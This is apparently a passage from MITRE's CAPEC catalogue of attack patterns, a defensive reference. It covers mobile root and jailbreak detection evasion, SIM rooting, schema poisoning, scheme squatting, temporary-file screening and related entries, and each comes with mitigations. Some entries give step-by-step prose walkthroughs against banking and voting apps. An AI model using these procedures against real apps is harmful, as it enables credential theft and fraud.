Related Weaknesses

Supply Chain: CWE does not currently cover Supply Chain in the way it is presented by CAPEC. Therefore, no mapping between the two corpuses can be made at this time.

Taxonomy Mappings

Relevant to the ATT&CK taxonomy mapping (see parent )

References

Content History

Submissions
Submission Date	Submitter	Organization
2014-06-23 (Version 2.6)	CAPEC Content Team	The MITRE Corporation
2014-06-23 (Version 2.6)
Modifications
Modification Date	Modifier	Organization
2015-11-09 (Version 2.7)	CAPEC Content Team	The MITRE Corporation
2015-11-09 (Version 2.7)	Updated Typical_Likelihood_of_Exploit
2020-07-30 (Version 3.3)	CAPEC Content Team	The MITRE Corporation
2020-07-30 (Version 3.3)	Updated Related_Attack_Patterns
2022-02-22 (Version 3.7)	CAPEC Content Team	The MITRE Corporation
2022-02-22 (Version 3.7)	Updated Mitigations, References

CAPEC-661: Root/Jailbreak Detection Evasion via Debugging

Attack Pattern ID: 661

Abstraction: Detailed

View customized information:

Description

Likelihood Of Attack

Medium

Typical Severity

Very High

Relationships

Nature	Type	ID	Name
ChildOf	Standard Attack Pattern - A standard level attack pattern in CAPEC is focused on a specific methodology or technique used in an attack. It is often seen as a singular piece of a fully executed attack. A standard attack pattern is meant to provide sufficient details to understand the specific technique and how it attempts to accomplish a desired goal. A standard level attack pattern is a specific type of a more abstract meta level attack pattern.	121	Exploit Non-Production Interfaces
CanPrecede	Standard Attack Pattern - A standard level attack pattern in CAPEC is focused on a specific methodology or technique used in an attack. It is often seen as a singular piece of a fully executed attack. A standard attack pattern is meant to provide sufficient details to understand the specific technique and how it attempts to accomplish a desired goal. A standard level attack pattern is a specific type of a more abstract meta level attack pattern.	68	Subvert Code-signing Facilities
CanPrecede	Detailed Attack Pattern - A detailed level attack pattern in CAPEC provides a low level of detail, typically leveraging a specific technique and targeting a specific technology, and expresses a complete execution flow. Detailed attack patterns are more specific than meta attack patterns and standard attack patterns and often require a specific protection mechanism to mitigate actual attacks. A detailed level attack pattern often will leverage a number of different standard level attack patterns chained together to accomplish a goal.	660	Root/Jailbreak Detection Evasion via Hooking

This table shows the views that this attack pattern belongs to and top level categories within that view.

View Name	Top Level Categories
Domains of Attack	Software, Hardware
Mechanisms of Attack	Abuse Existing Functionality

Execution Flow

Explore

Identify application with attack potential: The adversary searches for and identifies a mobile application that could be exploited for malicious purposes (e.g. banking, voting, or medical applications).
Techniques
Search application stores for mobile applications worth exploiting

Experiment

Debug the target application: The adversary inserts the debugger into the program entry point of the mobile application, after the application's signature has been identified, to dump its memory contents.

Techniques
Insert the debugger at the mobile application's program entry point, after the application's signature has been identified.
Dump the memory region containing the now decrypted code from the address space of the binary.

Remove application signature verification methods: Remove signature verification methods from the decrypted code and resign the application with a self-signed certificate.

Exploit

Execute the application and evade Root/Jailbreak detection methods: The application executes with the self-signed certificate, while believing it contains a trusted certificate. This now allows the adversary to evade Root/Jailbreak detection via code hooking or other methods.
Techniques
Optional: Hook code into the target application.

Prerequisites

A debugger must be able to be inserted into the targeted application.

Skills Required

[Level: High]

Knowledge about Root/Jailbreak detection and evasion techniques.

[Level: Medium]

Knowledge about runtime debugging.

Resources Required

The adversary must have a Rooted/Jailbroken mobile device with debugging capabilities.

Consequences

Scope	Impact	Likelihood
Integrity Authorization	Execute Unauthorized Commands
Confidentiality Access Control Authorization	Gain Privileges
Confidentiality Access Control	Read Data

Mitigations

Instantiate checks within the application code that ensures debuggers are not attached.

Example Instances

An adversary targets an iOS banking application in an attempt to compromise sensitive user data. The adversary launches the application with the iOS debugger and sets a breakpoint at the program entry point, after the application's signature has been verified. Next, the adversary dumps the memory region that contains the decrypted code from the address space of the binary. The 'Restrict' flag is then stripped from the application and the adversary resigns the application with a self-signed certificate. The application is now executed without the 'Restrict' flag, while trusting the self-signed certificate to be legitimate. However, the adversary is now able to evaded Jailbreak detection via code hooking or other methods and can glean user credentials and/or transaction details.

Related Weaknesses

CWE-ID	Weakness Name
489	Active Debug Code

References

[REF-625] San-Tsai Sun, Andrea Cuadros and Konstantin Beznosov. "Android Rooting: Methods, Detection, and Evasion". Technische Universität Braunschweig. 2019-06-17. <http://lersse-dl.ece.ubc.ca/record/310/files/p3.pdf?subformat=pdfa>. URL validated: 2020-12-15.

[REF-626] Jose Lopes. "Who owns your runtime?". Nettitude Labs. 2015-10-12. <https://labs.nettitude.com/blog/ios-and-android-runtime-and-anti-debugging-protections/#hooking>. URL validated: 2020-12-15.

[REF-627] Suresh Khutale. "Android Root Detection Bypass by Reverse Engineering APK". InfoSec Institute. 2018-03-06. <https://resources.infosecinstitute.com/topic/android-root-detection-bypass-reverse-engineering-apk/>. URL validated: 2020-12-15.

[REF-628] Manuel Egele, Christopher Kruegel, Engin Kirda and Giovanni Vigna. "PiOS: Detecting Privacy Leaks in iOS Applications". 2011-02-09. <https://www.ndss-symposium.org/wp-content/uploads/2017/09/egel.pdf>. URL validated: 2020-12-16.

Content History

Submissions
Submission Date	Submitter	Organization
2020-12-17 (Version 3.4)	CAPEC Content Team	The MITRE Corporation
2020-12-17 (Version 3.4)

CAPEC-660: Root/Jailbreak Detection Evasion via Hooking

Attack Pattern ID: 660

Abstraction: Detailed

View customized information:

Description

Likelihood Of Attack

Medium

Typical Severity

Very High

Relationships

Nature	Type	ID	Name
ChildOf	Standard Attack Pattern - A standard level attack pattern in CAPEC is focused on a specific methodology or technique used in an attack. It is often seen as a singular piece of a fully executed attack. A standard attack pattern is meant to provide sufficient details to understand the specific technique and how it attempts to accomplish a desired goal. A standard level attack pattern is a specific type of a more abstract meta level attack pattern.	251	Local Code Inclusion
CanFollow	Detailed Attack Pattern - A detailed level attack pattern in CAPEC provides a low level of detail, typically leveraging a specific technique and targeting a specific technology, and expresses a complete execution flow. Detailed attack patterns are more specific than meta attack patterns and standard attack patterns and often require a specific protection mechanism to mitigate actual attacks. A detailed level attack pattern often will leverage a number of different standard level attack patterns chained together to accomplish a goal.	661	Root/Jailbreak Detection Evasion via Debugging

This table shows the views that this attack pattern belongs to and top level categories within that view.

View Name	Top Level Categories
Domains of Attack	Software
Mechanisms of Attack	Inject Unexpected Items

Execution Flow

Explore

Identify application with attack potential: The adversary searches for and identifies a mobile application that could be exploited for malicious purposes (e.g. banking, voting, or medical applications).
Techniques
Search application stores for mobile applications worth exploiting

Experiment

Develop code to be hooked into chosen target application: The adversary develops code or leverages existing code that will be hooked into the target application in order to evade Root/Jailbreak detection methods.

Techniques
Develop code or leverage existing code to bypass Root/Jailbreak detection methods.
Test the code to see if it works.
Iteratively develop the code until Root/Jailbreak detection methods are evaded.

Exploit

Execute code hooking to evade Root/Jailbreak detection methods: Once hooking code has been developed or obtained, execute the code against the target application to evade Root/Jailbreak detection methods.
Techniques
Hook code into the target application.

Prerequisites

The targeted application must be non-restricted to allow code hooking.

Skills Required

[Level: High]

Knowledge about Root/Jailbreak detection and evasion techniques.

[Level: Medium]

Knowledge about code hooking.

Resources Required

The adversary must have a Rooted/Jailbroken mobile device.

The adversary needs to have enough access to the target application to control the included code or file.

Consequences

Scope	Impact	Likelihood
Integrity Authorization	Execute Unauthorized Commands
Confidentiality Access Control Authorization	Gain Privileges
Confidentiality Access Control	Read Data

Mitigations

Ensure mobile applications are signed appropriately to avoid code inclusion via hooking.

Inspect the application's memory for suspicious artifacts, such as shared objects/JARs or dylibs, after other Root/Jailbreak detection methods.

Inspect the application's stack trace for suspicious method calls.

Allow legitimate native methods, and check for non-allowed native methods during Root/Jailbreak detection methods.

For iOS applications, ensure application methods do not originate from outside of Apple's SDK.

Example Instances

An adversary targets a non-restricted iOS banking application in an attempt to compromise sensitive user data. The adversary creates Objective-C runtime code that always returns "false" when checking for the existence of the Cydia application. The malicious code is then dynamically loaded into the application via the DYLD_INSERT_LIBRARIES environment variable. When the banking applications checks for Cydia, the hooked code returns "false", so the application assumes the device is stock (i.e. not Jailbroken) and allows it to access the application. However, the adversary has just evaded Jailbreak detection and is now able to glean user credentials and/or transaction details.

An adversary targets a mobile voting application on an Android device with the goal of committing voter fraud. Leveraging the Xposed framework, the adversary is able to create and hook Java code into the application that bypasses Root detection methods. When the voting application attempts to detect a Rooted device by checking for commonly known installed packages associated with Rooting, the hooked code removes the suspicious packages before returning to the application. As a result, the application believes the device is stock (i.e. not Rooted) when in actuality this is not the case. Having evading Root detection, the adversary is now able to cast votes for the candidate of their choosing as a variety of different users.

Related Weaknesses

CWE-ID	Weakness Name
829	Inclusion of Functionality from Untrusted Control Sphere

Taxonomy Mappings

Relevant to the ATT&CK taxonomy mapping (also see parent)

Entry ID	Entry Name
1055	Process Injection

References

[REF-624] Ansgar Kellner, Micha Horlboge, Konrad Rieck and Christian Wressnegger. "False Sense of Security: A Study on the Effectivity of Jailbreak Detection in Banking Apps". Technische Universität Braunschweig. 2019-06-17. <https://cybersecurity.att.com/blogs/security-essentials/mobile-phishing>. URL validated: 2020-12-15.

Content History

Submissions
Submission Date	Submitter	Organization
2020-12-17 (Version 3.4)	CAPEC Content Team	The MITRE Corporation
2020-12-17 (Version 3.4)

CAPEC-614: Rooting SIM Cards

Attack Pattern ID: 614

Abstraction: Detailed

View customized information:

Description

Typical Severity

High

Relationships

Nature	Type	ID	Name
ChildOf	Standard Attack Pattern - A standard level attack pattern in CAPEC is focused on a specific methodology or technique used in an attack. It is often seen as a singular piece of a fully executed attack. A standard attack pattern is meant to provide sufficient details to understand the specific technique and how it attempts to accomplish a desired goal. A standard level attack pattern is a specific type of a more abstract meta level attack pattern.	186	Malicious Software Update

This table shows the views that this attack pattern belongs to and top level categories within that view.

View Name	Top Level Categories
Domains of Attack	Software
Mechanisms of Attack	Manipulate System Resources

Prerequisites

A SIM card that relies on the DES cipher.

Skills Required

[Level: Medium]

This is a sophisticated attack, but detailed techniques are published in open literature.

Consequences

Scope	Impact	Likelihood
Confidentiality Integrity	Execute Unauthorized Commands

Mitigations

Upgrade the SIM card to use the state-of-the-art AES or the somewhat outdated 3DES algorithm for OTA.

Related Weaknesses

CWE-ID	Weakness Name
327	Use of a Broken or Risky Cryptographic Algorithm

Taxonomy Mappings

Relevant to the ATT&CK taxonomy mapping (see parent )

References

[REF-486] Karsten Nohl. "Rooting SIM Cards". Security Research Labs. <https://srlabs.de/rooting-sim-cards/>.

Content History

Submissions
Submission Date	Submitter	Organization
2015-11-09 (Version 2.7)	CAPEC Content Team	The MITRE Corporation
2015-11-09 (Version 2.7)
Modifications
Modification Date	Modifier	Organization
2018-07-31 (Version 2.12)	CAPEC Content Team	The MITRE Corporation
2018-07-31 (Version 2.12)	Updated Attack_Motivation-Consequences
2019-09-30 (Version 3.2)	CAPEC Content Team	The MITRE Corporation
2019-09-30 (Version 3.2)	Updated Related_Attack_Patterns
2022-02-22 (Version 3.7)	CAPEC Content Team	The MITRE Corporation
2022-02-22 (Version 3.7)	Updated Related_Attack_Patterns
2022-09-29 (Version 3.8)	CAPEC Content Team	The MITRE Corporation
2022-09-29 (Version 3.8)	Updated Related_Attack_Patterns
Previous Entry Names
Change Date	Previous Entry Name
2017-01-09 (Version 2.9)	Rooting SIM CardS

CAPEC-582: Route Disabling

Attack Pattern ID: 582

Abstraction: Standard

View customized information:

Description

Likelihood Of Attack

Low

Typical Severity

High

Relationships

Nature	Type	ID	Name
ChildOf	Meta Attack Pattern - A meta level attack pattern in CAPEC is a decidedly abstract characterization of a specific methodology or technique used in an attack. A meta attack pattern is often void of a specific technology or implementation and is meant to provide an understanding of a high level approach. A meta level attack pattern is a generalization of related group of standard level attack patterns. Meta level attack patterns are particularly useful for architecture and design level threat modeling exercises.	607	Obstruction
ParentOf	Detailed Attack Pattern - A detailed level attack pattern in CAPEC provides a low level of detail, typically leveraging a specific technique and targeting a specific technology, and expresses a complete execution flow. Detailed attack patterns are more specific than meta attack patterns and standard attack patterns and often require a specific protection mechanism to mitigate actual attacks. A detailed level attack pattern often will leverage a number of different standard level attack patterns chained together to accomplish a goal.	583	Disabling Network Hardware
ParentOf	Detailed Attack Pattern - A detailed level attack pattern in CAPEC provides a low level of detail, typically leveraging a specific technique and targeting a specific technology, and expresses a complete execution flow. Detailed attack patterns are more specific than meta attack patterns and standard attack patterns and often require a specific protection mechanism to mitigate actual attacks. A detailed level attack pattern often will leverage a number of different standard level attack patterns chained together to accomplish a goal.	584	BGP Route Disabling
ParentOf	Detailed Attack Pattern - A detailed level attack pattern in CAPEC provides a low level of detail, typically leveraging a specific technique and targeting a specific technology, and expresses a complete execution flow. Detailed attack patterns are more specific than meta attack patterns and standard attack patterns and often require a specific protection mechanism to mitigate actual attacks. A detailed level attack pattern often will leverage a number of different standard level attack patterns chained together to accomplish a goal.	585	DNS Domain Seizure

This table shows the views that this attack pattern belongs to and top level categories within that view.

View Name	Top Level Categories
Domains of Attack	Software, Hardware, Communications, Social Engineering
Mechanisms of Attack	Manipulate System Resources

Prerequisites

The adversary requires knowledge of and access to network route.

Consequences

Scope	Impact	Likelihood
Availability	Other

Related Weaknesses

Communications: CWE does not currently cover Communications in the way it is presented by CAPEC. Therefore, no mapping between the two corpuses can be made at this time.

Content History

Submissions
Submission Date	Submitter	Organization
2017-02-14 (Version 2.9)	Seamus Tuohy
2017-02-14 (Version 2.9)
Modifications
Modification Date	Modifier	Organization
2019-09-30 (Version 3.2)	CAPEC Content Team	The MITRE Corporation
2019-09-30 (Version 3.2)	Updated Related_Attack_Patterns

CAPEC-564: Run Software at Logon

Attack Pattern ID: 564

Abstraction: Detailed

View customized information:

Description

Relationships

Nature	Type	ID	Name
ChildOf	Standard Attack Pattern - A standard level attack pattern in CAPEC is focused on a specific methodology or technique used in an attack. It is often seen as a singular piece of a fully executed attack. A standard attack pattern is meant to provide sufficient details to understand the specific technique and how it attempts to accomplish a desired goal. A standard level attack pattern is a specific type of a more abstract meta level attack pattern.	542	Targeted Malware

This table shows the views that this attack pattern belongs to and top level categories within that view.

View Name	Top Level Categories
Domains of Attack	Software
Mechanisms of Attack	Inject Unexpected Items

Mitigations

Restrict write access to logon scripts to necessary administrators.

Related Weaknesses

CWE-ID	Weakness Name
284	Improper Access Control

Taxonomy Mappings

Relevant to the ATT&CK taxonomy mapping (also see parent)

Entry ID	Entry Name
1037	Boot or Logon Initialization Scripts
1543.001	Create or Modify System Process: Launch Agent
1543.004	Create or Modify System Process: Launch Daemon
1547	Boot or Logon Autostart Execution

Content History

Submissions
Submission Date	Submitter	Organization
2015-11-09 (Version 2.7)	CAPEC Content Team	The MITRE Corporation
2015-11-09 (Version 2.7)
Modifications
Modification Date	Modifier	Organization
2018-07-31 (Version 2.12)	CAPEC Content Team	The MITRE Corporation
2018-07-31 (Version 2.12)	Updated References
2019-04-04 (Version 3.1)	CAPEC Content Team	The MITRE Corporation
2019-04-04 (Version 3.1)	Updated Related_Weaknesses
2020-07-30 (Version 3.3)	CAPEC Content Team	The MITRE Corporation
2020-07-30 (Version 3.3)	Updated Taxonomy_Mappings
2020-12-17 (Version 3.4)	CAPEC Content Team	The MITRE Corporation
2020-12-17 (Version 3.4)	Updated Taxonomy_Mappings
2021-06-24 (Version 3.5)	CAPEC Content Team	The MITRE Corporation
2021-06-24 (Version 3.5)	Updated Taxonomy_Mappings
2022-09-29 (Version 3.8)	CAPEC Content Team	The MITRE Corporation
2022-09-29 (Version 3.8)	Updated Taxonomy_Mappings

CAPEC-510: SaaS User Request Forgery

Attack Pattern ID: 510

Abstraction: Standard

View customized information:

Description

Likelihood Of Attack

High

Typical Severity

Medium

Relationships

Nature	Type	ID	Name
ChildOf	Meta Attack Pattern - A meta level attack pattern in CAPEC is a decidedly abstract characterization of a specific methodology or technique used in an attack. A meta attack pattern is often void of a specific technology or implementation and is meant to provide an understanding of a high level approach. A meta level attack pattern is a generalization of related group of standard level attack patterns. Meta level attack patterns are particularly useful for architecture and design level threat modeling exercises.	21	Exploitation of Trusted Identifiers

This table shows the views that this attack pattern belongs to and top level categories within that view.

View Name	Top Level Categories
Domains of Attack	Software
Mechanisms of Attack	Subvert Access Control

Prerequisites

An adversary must be able install a purpose built malicious application onto the trusted user's system and convince the user to execute it while authenticated to the SaaS application.

Skills Required

[Level: Medium]

This attack pattern often requires the technical ability to modify a malicious software package (e.g. Zeus) to spider a targeted site and a way to trick a user into a malicious software download.

Mitigations

To limit one's exposure to this type of attack, tunnel communications through a secure proxy service.

Detection of this type of attack can be done through heuristic analysis of behavioral anomalies (a la credit card fraud detection) which can be used to identify inhuman behavioral patterns. (e.g., spidering)

Related Weaknesses

CWE-ID	Weakness Name
346	Origin Validation Error

Notes

Other

SaaS/Cloud applications are often accessed from unmanaged systems and devices, over untrusted networks that are outside corporate IT control. The likelihood of a cloud service being accessed by a trusted user though an untrusted device is high. Several instances of this style of attack have been found.

Taxonomy Mappings

Relevant to the ATT&CK taxonomy mapping (see parent )

References

[REF-438] Ami Luttwak. "A new Zeus variant targeting Salesforce.com – Research and Analysis". Adallom, Inc.. <http://www.adallom.com/blog/a-new-zeus-variant-targeting-salesforce-com-accounts-research-and-analysis/>.

Content History

Submissions
Submission Date	Submitter	Organization
2014-06-23 (Version 2.6)	CAPEC Content Team	The MITRE Corporation
2014-06-23 (Version 2.6)

CAPEC-310: Scanning for Vulnerable Software

Attack Pattern ID: 310

Abstraction: Detailed

View customized information:

Description

Typical Severity

Low

Relationships

Nature	Type	ID	Name
ChildOf	Standard Attack Pattern - A standard level attack pattern in CAPEC is focused on a specific methodology or technique used in an attack. It is often seen as a singular piece of a fully executed attack. A standard attack pattern is meant to provide sufficient details to understand the specific technique and how it attempts to accomplish a desired goal. A standard level attack pattern is a specific type of a more abstract meta level attack pattern.	541	Application Fingerprinting

This table shows the views that this attack pattern belongs to and top level categories within that view.

View Name	Top Level Categories
Domains of Attack	Software
Mechanisms of Attack	Collect and Analyze Information

Prerequisites

Access to the network on which the targeted system resides.

Software tools used to probe systems over a range of ports and protocols.

Skills Required

[Level: Medium]

To probe a system remotely without detection requires careful planning and patience.

Resources Required

Consequences

Scope	Impact	Likelihood
Confidentiality	Other
Confidentiality Access Control Authorization	Bypass Protection Mechanism Hide Activities

Related Weaknesses

CWE-ID	Weakness Name
200	Exposure of Sensitive Information to an Unauthorized Actor

Taxonomy Mappings

Relevant to the ATT&CK taxonomy mapping (see parent )

References

[REF-33] Stuart McClure, Joel Scambray and George Kurtz. "Hacking Exposed: Network Security Secrets & Solutions". Chapter 2: Scanning, pg. 56. 6th Edition. McGraw Hill. 2009.

[REF-130] Gordon "Fyodor" Lyon. "The Art of Port Scanning". Volume: 7, Issue. 51. Phrack Magazine. 1997. <http://phrack.org/issues/51/11.html>.

Content History

Submissions
Submission Date	Submitter	Organization
2014-06-23 (Version 2.6)	CAPEC Content Team	The MITRE Corporation
2014-06-23 (Version 2.6)
Modifications
Modification Date	Modifier	Organization
2015-12-07 (Version 2.8)	CAPEC Content Team	The MITRE Corporation
2015-12-07 (Version 2.8)	Updated Related_Attack_Patterns
2018-07-31 (Version 2.12)	CAPEC Content Team	The MITRE Corporation
2018-07-31 (Version 2.12)	Updated References, Related_Weaknesses

CAPEC-271: Schema Poisoning

Attack Pattern ID: 271

Abstraction: Standard

View customized information:

Description

Likelihood Of Attack

Low

Typical Severity

High

Relationships

Nature	Type	ID	Name
ChildOf	Meta Attack Pattern - A meta level attack pattern in CAPEC is a decidedly abstract characterization of a specific methodology or technique used in an attack. A meta attack pattern is often void of a specific technology or implementation and is meant to provide an understanding of a high level approach. A meta level attack pattern is a generalization of related group of standard level attack patterns. Meta level attack patterns are particularly useful for architecture and design level threat modeling exercises.	176	Configuration/Environment Manipulation
ParentOf	Detailed Attack Pattern - A detailed level attack pattern in CAPEC provides a low level of detail, typically leveraging a specific technique and targeting a specific technology, and expresses a complete execution flow. Detailed attack patterns are more specific than meta attack patterns and standard attack patterns and often require a specific protection mechanism to mitigate actual attacks. A detailed level attack pattern often will leverage a number of different standard level attack patterns chained together to accomplish a goal.	146	XML Schema Poisoning
CanFollow	Meta Attack Pattern - A meta level attack pattern in CAPEC is a decidedly abstract characterization of a specific methodology or technique used in an attack. A meta attack pattern is often void of a specific technology or implementation and is meant to provide an understanding of a high level approach. A meta level attack pattern is a generalization of related group of standard level attack patterns. Meta level attack patterns are particularly useful for architecture and design level threat modeling exercises.	94	Adversary in the Middle (AiTM)

This table shows the views that this attack pattern belongs to and top level categories within that view.

View Name	Top Level Categories
Domains of Attack	Software
Mechanisms of Attack	Manipulate System Resources

Execution Flow

Explore

Find target application and schema: The adversary first finds the application that they want to target. This application must use schemas in some way, so the adversary also needs to confirm that schemas are being used.
Techniques
Gain access to the system that the application is on and look for a schema.
Observe HTTP traffic to the application and look for a schema being transmitted.

Experiment

Gain access to schema: The adversary gains access to the schema so that they can modify the contents.

Techniques
For a local scenario, the adversary needs access to the machine that the schema is located on and gain permissions to alter the contents of the schema file.
For a remote scenario, the adversary needs to be able to perform an adversary in the middle attack on the HTTP traffic that contains a schema.

Exploit

Poison schema: Once the adversary gains access to the schema, they will alter it to achieve a desired effect. Locally, they can just modify the file. For remote schemas, the adversary will alter the schema in transit by performing an adversary in the middle attack.

Techniques
Cause a denial of service by modifying the schema so that it does not contain required information for subsequent processing.
Manipulation of the data types described in the schema may affect the results of calculations. For example, a float field could be changed to an int field.
Change the encoding defined in the schema for certain fields allowing the contents to bypass filters that scan for dangerous strings. For example, the modified schema might use a URL encoding instead of ASCII, and a filter that catches a semicolon (;) might fail to detect its URL encoding (%3B).

Prerequisites

Some level of access to modify the target schema.

The schema used by the target application must be improperly secured against unauthorized modification and manipulation.

Resources Required

Access to the schema and the knowledge and ability modify it. Ability to replace or redirect access to the modified schema.

Consequences

Scope	Impact	Likelihood
Availability	Unreliable Execution Resource Consumption
Integrity	Modify Data
Confidentiality	Read Data

Mitigations

Design: Protect the schema against unauthorized modification.

Implementation: For applications that use a known schema, use a local copy or a known good repository instead of the schema reference supplied in the schema document.

Implementation: For applications that leverage remote schemas, use the HTTPS protocol to prevent modification of traffic in transit and to avoid unauthorized modification.

Example Instances

In a JSON Schema Poisoning Attack, an adervary modifies the JSON schema to cause a Denial of Service (DOS) or to submit malicious input:

{ "title": "Contact", "type": "object", "properties": { "Name": { "type": "string" }, "Phone": { "type": "string" }, "Email": { "type": "string" }, "Address": { "type": "string" } }, "required": ["Name", "Phone", "Email", "Address"] }

If the 'name' attribute is required in all submitted documents and this field is removed by the adversary, the application may enter an unexpected state or record incomplete data. Additionally, if this data is needed to perform additional functions, a Denial of Service (DOS) may occur.

In a Database Schema Poisoning Attack, an adversary alters the database schema being used to modify the database in some way. This can result in loss of data, DOS, or malicious input being submitted. Assuming there is a column named "name", an adversary could make the following schema change:

ALTER TABLE Contacts MODIFY Name VARCHAR(65353);

The "Name" field of the "Conteacts" table now allows the storing of names up to 65353 characters in length. This could allow the adversary to store excess data within the database to consume system resource or to execute a DOS.

Related Weaknesses

CWE-ID	Weakness Name
15	External Control of System or Configuration Setting

Content History

Submissions
Submission Date	Submitter	Organization
2014-06-23 (Version 2.6)	CAPEC Content Team	The MITRE Corporation
2014-06-23 (Version 2.6)
Modifications
Modification Date	Modifier	Organization
2017-01-09 (Version 2.9)	CAPEC Content Team	The MITRE Corporation
2017-01-09 (Version 2.9)	Updated Description, Description Summary, Related_Attack_Patterns
2018-07-31 (Version 2.12)	CAPEC Content Team	The MITRE Corporation
2018-07-31 (Version 2.12)	Updated Attack_Motivation-Consequences, Attack_Prerequisites, Description Summary, Examples-Instances, Related_Weaknesses, Resources_Required, Solutions_and_Mitigations, Typical_Likelihood_of_Exploit, Typical_Severity
2019-04-04 (Version 3.1)	CAPEC Content Team	The MITRE Corporation
2019-04-04 (Version 3.1)	Updated Related_Weaknesses
2020-07-30 (Version 3.3)	CAPEC Content Team	The MITRE Corporation
2020-07-30 (Version 3.3)	Updated Related_Attack_Patterns
2021-10-21 (Version 3.6)	CAPEC Content Team	The MITRE Corporation
2021-10-21 (Version 3.6)	Updated Execution_Flow, Related_Attack_Patterns
2022-09-29 (Version 3.8)	CAPEC Content Team	The MITRE Corporation
2022-09-29 (Version 3.8)	Updated Example_Instances
2023-01-24 (Version 3.9)	CAPEC Content Team	The MITRE Corporation
2023-01-24 (Version 3.9)	Updated Related_Attack_Patterns

CAPEC-505: Scheme Squatting

Attack Pattern ID: 505

Abstraction: Detailed

View customized information:

Description

Relationships

Nature	Type	ID	Name
ChildOf	Standard Attack Pattern - A standard level attack pattern in CAPEC is focused on a specific methodology or technique used in an attack. It is often seen as a singular piece of a fully executed attack. A standard attack pattern is meant to provide sufficient details to understand the specific technique and how it attempts to accomplish a desired goal. A standard level attack pattern is a specific type of a more abstract meta level attack pattern.	616	Establish Rogue Location

This table shows the views that this attack pattern belongs to and top level categories within that view.

View Name	Top Level Categories
Domains of Attack	Social Engineering
Mechanisms of Attack	Engage in Deceptive Interactions

Mitigations

The only known mitigation to this attack is to avoid installing the malicious application on the device. Applications usually have to declare the schemes they wish to register, so detecting this during a review is feasible.

Related Weaknesses

Social Engineering: CWE does not currently cover Social Engineering in the way it is presented by CAPEC. Therefore, no mapping between the two corpuses can be made at this time.

Taxonomy Mappings

Relevant to the ATT&CK taxonomy mapping (see parent )

References

[REF-434] Adrienne Porter Felt and David Wagner. "Phishing on Mobile Devices". 4.1.2 Man-In-The-Middle. University of California, Berkeley. 2011. <https://people.eecs.berkeley.edu/~daw/papers/mobphish-w2sp11.pdf>.

Content History

Submissions
Submission Date	Submitter	Organization
2014-06-23 (Version 2.6)	CAPEC Content Team	The MITRE Corporation
2014-06-23 (Version 2.6)
Modifications
Modification Date	Modifier	Organization
2018-07-31 (Version 2.12)	CAPEC Content Team	The MITRE Corporation
2018-07-31 (Version 2.12)	Updated References
2019-09-30 (Version 3.2)	CAPEC Content Team	The MITRE Corporation
2019-09-30 (Version 3.2)	Updated Related_Attack_Patterns
2020-12-17 (Version 3.4)	CAPEC Content Team	The MITRE Corporation
2020-12-17 (Version 3.4)	Updated Related_Attack_Patterns
2022-09-29 (Version 3.8)	CAPEC Content Team	The MITRE Corporation
2022-09-29 (Version 3.8)	Updated Related_Attack_Patterns

CAPEC-155: Screen Temporary Files for Sensitive Information

Attack Pattern ID: 155

Abstraction: Detailed

View customized information:

Description

Likelihood Of Attack

Medium

Typical Severity

Medium

Relationships

Nature	Type	ID	Name
ChildOf	Standard Attack Pattern - A standard level attack pattern in CAPEC is focused on a specific methodology or technique used in an attack. It is often seen as a singular piece of a fully executed attack. A standard attack pattern is meant to provide sufficient details to understand the specific technique and how it attempts to accomplish a desired goal. A standard level attack pattern is a specific type of a more abstract meta level attack pattern.	150	Collect Data from Common Resource Locations
CanFollow	Detailed Attack Pattern - A detailed level attack pattern in CAPEC provides a low level of detail, typically leveraging a specific technique and targeting a specific technology, and expresses a complete execution flow. Detailed attack patterns are more specific than meta attack patterns and standard attack patterns and often require a specific protection mechanism to mitigate actual attacks. A detailed level attack pattern often will leverage a number of different standard level attack patterns chained together to accomplish a goal.	149	Explore for Predictable Temporary File Names

This table shows the views that this attack pattern belongs to and top level categories within that view.

View Name	Top Level Categories
Domains of Attack	Software
Mechanisms of Attack	Collect and Analyze Information

Execution Flow

Explore

Look for temporary files in target application: An adversary will try to discover temporary files in a target application. Knowledge of where the temporary files are being stored is important information.

Experiment

Attempt to read temporary files: An adversary will attempt to read any temporary files they may have discovered through normal means.

Techniques
Attempt to get the file by querying the file path to a web server
Using a remote shell into an application, read temporary files and send out information remotely if necessary
Recover temporary information from a user's browser cache

Exploit

Use function weaknesses to gain access to temporary files: If normal means to read temporary files did not work, an adversary will attempt to exploit weak temporary file functions to gain access to temporary files.

Techniques

Some C functions such as tmpnam(), tempnam(), and mktemp() will create a temporary file with a unique name, but do not stop an adversary from creating a file of the same name before it is opened by the application. Because these functions do not create file names that are sufficiently random, an adversary will try to make a file of the same name, causing a collision, and possibly altering file permissions for the temporary file so that it is able to be read.

Similar to the last technique, an adversary might also create a file name collision using a linked file in a unix system such that the temporary file contents written out by the application write to a file of the adversaries choosing, allowing them to read the file contents.

Prerequisites

The target application must utilize temporary files and must fail to adequately secure them against other parties reading them.

Resources Required

Because some application may have a large number of temporary files and/or these temporary files may be very large, an adversary may need tools that help them quickly search these files for sensitive information. If the adversary can simply copy the files to another location and if the speed of the search is not important, the adversary can still perform the attack without any special resources.

Related Weaknesses

CWE-ID	Weakness Name
377	Insecure Temporary File

Taxonomy Mappings

Relevant to the ATT&CK taxonomy mapping (see parent )

Content History

Submissions
Submission Date	Submitter	Organization
2014-06-23 (Version 2.6)	CAPEC Content Team	The MITRE Corporation
2014-06-23 (Version 2.6)
Modifications
Modification Date	Modifier	Organization
2017-01-09 (Version 2.9)	CAPEC Content Team	The MITRE Corporation
2017-01-09 (Version 2.9)	Updated Related_Attack_Patterns
2017-08-04 (Version 2.11)	CAPEC Content Team	The MITRE Corporation
2017-08-04 (Version 2.11)	Updated Activation_Zone, Description Summary, Injection_Vector, Payload, Payload_Activation_Impact, Related_Vulnerabilities, Resources_Required, Typical_Likelihood_of_Exploit
2019-04-04 (Version 3.1)	CAPEC Content Team	The MITRE Corporation
2019-04-04 (Version 3.1)	Updated Related_Weaknesses
2019-09-30 (Version 3.2)	CAPEC Content Team	The MITRE Corporation
2019-09-30 (Version 3.2)	Updated Related_Attack_Patterns
2020-07-30 (Version 3.3)	CAPEC Content Team	The MITRE Corporation
2020-07-30 (Version 3.3)	Updated Related_Attack_Patterns
2020-12-17 (Version 3.4)	CAPEC Content Team	The MITRE Corporation
2020-12-17 (Version 3.4)	Updated Related_Attack_Patterns
2021-10-21 (Version 3.6)	CAPEC Content Team	The MITRE Corporation
2021-10-21 (Version 3.6)	Updated Execution_Flow

CAPEC-471: Search Order Hijacking

Attack Pattern ID: 471

Abstraction: Detailed

View customized information:

Description

Typical Severity

Medium

Relationships

Nature	Type	ID	Name
